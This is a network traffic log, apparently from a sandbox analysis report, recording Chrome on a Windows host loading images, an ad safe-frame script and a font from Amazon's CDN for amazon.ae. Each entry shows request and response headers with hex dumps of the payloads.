                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 3952
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 9584d943-ddf0-4320-8ed8-721e432239f5
                                                                                                                                                                                                                                                                      Date: Mon, 19 Aug 2024 05:33:43 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 16 Aug 2024 07:30:47 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-428,/images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Outdoor_EN_1x
                                                                                                                                                                                                                                                                      Expires: Sun, 14 Aug 2044 05:33:43 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-428 /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Outdoor_EN_1x
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 72aa637991c46f23f831d2a4b7cb6c9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 219300
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: JXh7N7bO2wYrij4DPJ2ltc1gEIoHpJoVncznkaWWzacfQjt89vErqg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC3952INData Raw: ff d8 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff dd 00 04 00 0c ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 00 74 00 ba 03 00 22 00 01 11 01 02 11 01 ff c4 00 a4 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 03 04 05 02 01 08 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 06 10 00 02 01 03 03 02 03 04 05 08 08 07 00 00 00 00 01 02 03 00 04 05 06
                                                                                                                                                                                                                                                                      Data Ascii: #"""#''''''''''!! !!''''''''''Adobedt"


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      39192.168.2.54975618.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC704OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924076_186x116_1X_en_AE._SY116_CB566513340_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4101
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: c1c4643d-6a80-4b97-bca4-3684dbcc3aca
                                                                                                                                                                                                                                                                      Date: Fri, 09 Aug 2024 20:48:29 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 13:38:27 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-320,/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924076_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Thu, 04 Aug 2044 20:48:29 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-320 /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924076_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 400be015a105355a3fb16d2aa2a6d926.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 219301
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: J0W5lV4ip5q2CsROx9Tp9FaJ7o8r1lciFkfyEdmj20lvXGJhz1C8OQ==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC4101INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 06 04 06 06 06 06 08 0d 09 09 08 09 09 10 0c 09 0c 0b 0f 09 0b 0b 0f 0b 0f 0f 0b 0d 0f 0d 0d 11 0f 0d 0d 0f 11 0d 0f 10 17 10 12 10 14 11 10 15 10 17 10 17 16 16 17 19 1a 17 0f 19 23 01 06 06 03 06 06 06 08 06 06 0d 15 0f 09 11 16 12 08 10 1a 16 1a 11 16 17 16 16 10 1d 16 1a 15 16 0d 17 16 11 14 14 11 11 12 10 12 16 11 17 17 17 09 10 17 15 0f 1f 10 11 0f 16 15 19 14 0f 17 1c ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 ad 00 00 01 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 08 03 04 05 06 07 09 10 00 01 03 02 03 04 06 06 06 07 08 03 00 00 00 00 01 00 02 03 04 11 05 12 21 06 31 41 51 13 22 32 61 92 d1 07 08 17 54 81 91 14 53 71 b1 c1 d2 15 23 42
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#t"!1AQ"2aTSq#B


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      40192.168.2.54975418.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC612OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b.js HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1674INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                                                                      Content-Length: 30946
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 811de2e3-b5b5-4811-8bef-e6b5229ae4a1
                                                                                                                                                                                                                                                                      Date: Sat, 17 Aug 2024 01:11:31 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                      Last-Modified: Sat, 17 Aug 2024 01:10:55 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-886,/images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b
                                                                                                                                                                                                                                                                      Expires: Thu, 13 Feb 2025 01:11:31 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-886 /images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Via: 1.1 0ce4e0ab92519d33ff3c6cca42806b7e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 407823
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: eusECl26yPhyVoC6AGxFOkimcPVn2kTHtOYyiOSiJwU7gY4NhWkFIA==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC14710INData Raw: 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 22 73 66 49 6d 70 72 65 73 73 69 6f 6e 22 2c 74 3d 22 4c 69 67 68 74 41 64 49 6d 70 72 65 73 73 69 6f 6e 22 2c 69 3d 22 76 69 65 77 61 62 6c 65 6c 61 74 65 6e 63 79 22 2c 61 3d 28 65 2c 74 2c 69 29 3d 3e 28 7b 63 73 61 4b 65 79 3a 65 2c 63 73 6d 4b 65 79 3a 74 2c 63 73 6d 4d 65 73 73 61 67 65 3a 69 7d 29 2c 73 3d 28 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 65 29 2c 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 74 29 2c 61 28 22 62 6f 64 79 45 6e 64 22 2c 22 62 65 22 29 29 2c 72 3d 28 61 28 22 63 6c 69 63 6b 54 6f 41 54 46 22 2c 22 61 66 22 29 2c 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65 22 2c 22 63 66 22 29 29 2c 6e 3d 28 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65
                                                                                                                                                                                                                                                                      Data Ascii: (()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC16236INData Raw: 54 4d 4c 3b 73 2e 61 73 79 6e 63 3d 21 31 2c 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 60 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 2c 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 7d 60 29 7d 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 73 2c 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 2c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 69 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 2c 5f 65 3d 65 3d 3e 7b 69 66 28 6e 75 6c 6c 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e
                                                                                                                                                                                                                                                                      Data Ascii: TML;s.async=!1,s.setAttribute("src",`data:text/javascript;charset=UTF-8,${encodeURIComponent(t)}`)}null===(t=e.parentNode)||void 0===t||t.insertBefore(s,e.nextSibling),null===(i=e.parentNode)||void 0===i||i.removeChild(e)},_e=e=>{if(null==document.documen


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      41192.168.2.54976218.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC704OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924077_186x116_1X_en_AE._SY116_CB566504241_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC938INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 5795
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 1efb14f2-f79e-461b-8c2d-1e01a8d9c597
                                                                                                                                                                                                                                                                      Date: Fri, 09 Aug 2024 20:48:29 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 20:38:54 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-512,/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924077_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Thu, 04 Aug 2044 20:48:29 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-512 /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924077_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Via: 1.1 6553b2bbd8fca4153c739e94065a1184.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 408489
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: qdfIlX4k9Z2MPyX4ee4HpVaszmEXG26n1_5VOzaY_Mrlqji0Tq1biQ==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC5795INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 03 02 03 03 03 03 04 06 05 05 04 05 05 08 06 04 06 05 07 05 05 05 07 05 07 07 05 06 07 06 06 08 07 06 06 07 08 06 07 08 0b 08 09 08 0a 08 08 0a 08 0b 08 0b 0b 0b 0b 0c 0d 0b 07 0c 11 01 03 03 02 03 03 03 04 03 03 06 0a 07 05 08 0b 09 04 08 0d 0b 0d 08 0b 0b 0b 0b 08 0e 0b 0d 0a 0b 06 0b 0b 08 0a 0a 08 08 09 08 09 0b 08 0b 0b 0b 05 08 0b 0a 07 0f 08 08 07 0b 0a 0c 0a 07 0b 0e ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 00 01 04 03 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 07 08 01 05 06 04 09 0a 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 06 07 02 05 08 01 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fa c8 04 e3 9d d2 db 88 f3
                                                                                                                                                                                                                                                                      Data Ascii: JFIFt"9


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      42192.168.2.54976618.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC704OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924078_186x116_1X_en_AE._SY116_CB566504241_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 5698
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: f41fa45c-4302-4f4f-b06c-c1b6e4be7e05
                                                                                                                                                                                                                                                                      Date: Fri, 09 Aug 2024 20:48:18 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 20:38:54 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-808,/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924078_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Thu, 04 Aug 2044 20:48:18 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-808 /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924078_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 8c92bd4fd6a606ee9b09d4fd234f7ca8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 373564
                                                                                                                                                                                                                                                                      Server-Timing: cdn-cache-hit,cdn-pop;desc="AMS1-P3",cdn-rid;desc="U0QRtujJob4gq8FsqSutsXny9Qus05hUw_0MMBJtITlYrvmOJ_UdKQ==",cdn-hit-layer;desc="Origin Shield",cdn-downstream-fbl;dur=103,provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: U0QRtujJob4gq8FsqSutsXny9Qus05hUw_0MMBJtITlYrvmOJ_UdKQ==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC5698INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 03 02 03 03 03 03 04 06 05 05 04 05 05 08 06 04 06 05 07 05 05 05 07 05 07 07 05 06 07 06 06 08 07 06 06 07 08 06 07 08 0b 08 09 08 0a 08 08 0a 08 0b 08 0b 0b 0b 0b 0c 0d 0b 07 0c 11 01 03 03 02 03 03 03 04 03 03 06 0a 07 05 08 0b 09 04 08 0d 0b 0d 08 0b 0b 0b 0b 08 0e 0b 0d 0a 0b 06 0b 0b 08 0a 0a 08 08 09 08 09 0b 08 0b 0b 0b 05 08 0b 0a 07 0f 08 08 07 0b 0a 0c 0a 07 0b 0e ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 05 06 07 08 09 02 04 0a 03 01 01 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 08 01 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 db 20 dc 79 dc 12 bc 5c 88
                                                                                                                                                                                                                                                                      Data Ascii: JFIFt"9 y\


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      43192.168.2.549770151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1425OUTGET /images/S/sash/pDxWAF1pBB0dzGB.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                      Referer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314P
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC710INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 16616
                                                                                                                                                                                                                                                                      Content-Type: application/font-woff2; charset=utf-8
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 229e23b0-2363-4f56-a9f3-9324be97aa14
                                                                                                                                                                                                                                                                      Expires: Fri, 13 Feb 2043 07:28:13 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 30 Oct 2020 21:19:16 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      Age: 1249596
